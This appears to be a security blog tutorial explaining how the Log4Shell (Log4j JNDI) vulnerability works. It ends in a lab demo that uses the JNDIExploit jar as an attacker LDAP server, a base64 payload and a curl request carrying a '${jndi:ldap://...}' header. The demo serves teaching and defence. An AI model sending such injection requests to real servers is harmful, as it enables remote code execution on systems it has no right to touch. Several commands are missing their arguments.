Skip to main content

Now, it’s been a few days since we heard about the Log4j vulnerability in the cyber world. There are tons of information published on this matter in these few days. We have covered most of the important things related to the Lob4j vulnerability on our blogs such as how to fix the Log4j vulnerability with some prevention and mitigation tips. However, there is information that is not covered. One such piece of information is how does it work. Let’s see how does the Log4j vulnerability works pragmatically in this post.

To understand how does the Log4j vulnerability work, we should be familiar with the Log4j library, JNDI, and LDAP services. Let’s see all of them one after another.

What Is JNDI?

Java Naming and Directory Interface. It is a Java API that allows applications to communicate with other applications such as LDAP, DNS, NIS, NDS, RMI, and CORBA. Its main function is to provide naming and directory functionality to applications developed in the Java language. It runs on top of a Java application to fetch files from a database using naming conventions. It is defined to be independent of any specific directory service implementation.

JNDI architecture has two main components: JNDI API and JNDI SPI. API is used to access different naming and directory services. It allows the Java application to communicate with applications such as LDAP, DNS, NIS, NDS, RMI, and CORBA. JNDI has a JNDI SPI (Service Provider Interface) for each naming and directory service to communicate with different services.

JNDI Architecture

What Is LDAP?

LDAP is the lightweight version of the directory protocol. Its expanded version is Lightweight Directory Access Protocol. It’s a part of x.500 network standards. basically, it’s an open-source, vendor-neutral, industry-standard application protocol used to access and maintain distributed directory services over the network. It stores users, passwords, profile information, computer objects, and more, and shares all the information with other infrastructure and application entities over the network.

LDAP Service

What Is Log4j Library?

Log4j is a logging framework written in Java and distributed under the Apache Software License. It is predominately used to capture, format, and publish the logging information produced by systems and applications to multiple destinations.  It has three different components to perform its activities. It uses JNDI services to get the information from the different naming and directory services.

  1. Loggers: Captures logging information.
  2. Appenders: Publishes logging information to multiple destinations.
  3. Layouts: Format logging information in different styles.
Log4j Library

What Is Log4j Vulnerability?

The vulnerability lice in when the Log4j2 library is able to receive variable data from the LDAP and JNDI lookup and execute it without verification. This resulted in an open threat that could be used to send the malicious payload by crafting a malicious request.

Note: This vulnerability is also named as Log4Shell and Log4Jam.

Impact Of Log4j Vulnerability:

Log4j vulnerability could be used to perform several cyber attacks.

  1. Deploy coin miners
  2. Supply chain attacks
  3. Deploying malware like remote access trojans and ransomware
  4. Remote code execution and Arbitrary code execution
  5. Denial of services

See Also How To Fix CVE-2022-27511(2), Security Bypass Vulnerability In Citrix ADM

Vulnerabilities Found in Log4j:

vulnerabilityCVSSDescriptionFixed In
CVE-2021-4422810.0 CriticalUnauthenticated Remote Code Execution vulnerability in Log4j Logging Library2.15.0
CVE-2021-450463.7 LowDenial of Service vulnerability in Log4j Logging Library2.16.0
CVE-2021-451057.5 HighDenial of Service vulnerability in Log4j Logging Library due to infinite recursion in lookup evaluation2.17.0
CVE-2021-448326.6 MediumRCE vulnerability could allow attackers to modify the logging configuration file to execute code via a data source referencing a JNDI URI.2.17.1

How Does The Log4j Vulnerability Work?

Let’s see how does Log4j vulnerability work in theory before moving to practical.
In order to see how does Log4j vulnerability work:

  1. Once attacker found a server with vulnerable version of Log4j library,  the attacker will send a get request to the victim server with attacker’s LDAP server’s link in it.
  2. The victim server will just connect to the attacker’s LDAP server without verifying it.
  3. Then the attacker will send a LDAP response to the victim server with malicious payload. Since Log4j2 library is vulnerable to receive the payload and execute without verification. The attacker can make use of this vulnerability to compromise the victim server.

We have created a lap set up to demonstrate how does Log4j vulnerability work. We have two virtual machines created: 1. Ubuntu which acts as the victim, 2. Linux Mint plays the role of attacker’s LDAP server.

1. Ubuntu server Runs vulnerable Log4j
2. Linux Mint Attacker LDAP server which runs HTTP and LDAP services.

  1. Run Vulnerable application on the Victim serverWe are going to run the vulnerable application in a Docker container. First install the Docker IO then pull the application image and run.

    # apt install
    # docker run –name vulnerable-app -p 8080:8080

    Run Log4j Vulnerable application
  2. Run the LDAP and HTTP service on the attacker serverUse these commands to clone the LDAP and HTTP services.

    # apt install git
    # git clone
    # cd Log4shell_JNDIExploit/
    # unzip
    # chmod +x JNDIExploit-1.2-SNAPSHOT.jar

    Run the jar file using Java. Replace the IP with the attacker’s IP address.

    # java -jar JNDIExploit-1.2-SNAPSHOT.jar -i -p 8888

    Run the LDAP and HTTP service on the attacker server
  3. Create a payload for LDAP requestYou need to create a payload and convert it into base64 encoding to attach the LDAP request. We creating a simple payload that just creates ‘malware.text‘ file inside ‘/tmp’ directory in the application container.

    # echo “echo ‘This is a malware’ > /tmp/malware.txt” | base64

    Create a payload for LDAP request
  4. Frame and send an LDAP request with the attacker’s LDAP server linkCreate and send an LDAP request to the victim server with the attacker’s LDAP server link.
    Curl is a powerful command-line utility to send HTTP requests.

    1. curl Sending a HTTP request to victim server.
    2. -H ‘X-Api-Version:- H flag is used to send the LDAP request
    3. ${jndi:ldap://– JNDI look up with attacker’s LDAP server link with base64 payload.

    # curl -H ‘X-Api-Version: ${jndi:ldap://}’

    Frame and send a LDAP request with attacker's LDAP server link
  5. Request received to the LDAP serverYou can see the request received to the LDAP server.

    Request received at the LDAP server
  6. Execution of the payload on the victim serverIf your Log4j is vulnerable, the payload will be executed. You will see malware.txt created on the application container. Check the file inside /tmp on the application.

    # docker exec vulnerable-app ls /tmp

    Execution of the payload on the victim server

See Also List Of Cisco Products Affected By Spring4Shell Vulnerability

This demo proves that Log4j will accept the payload in the look-up strings and execute without verification. You can see how dangerous the vulnerability is.

Leave a Reply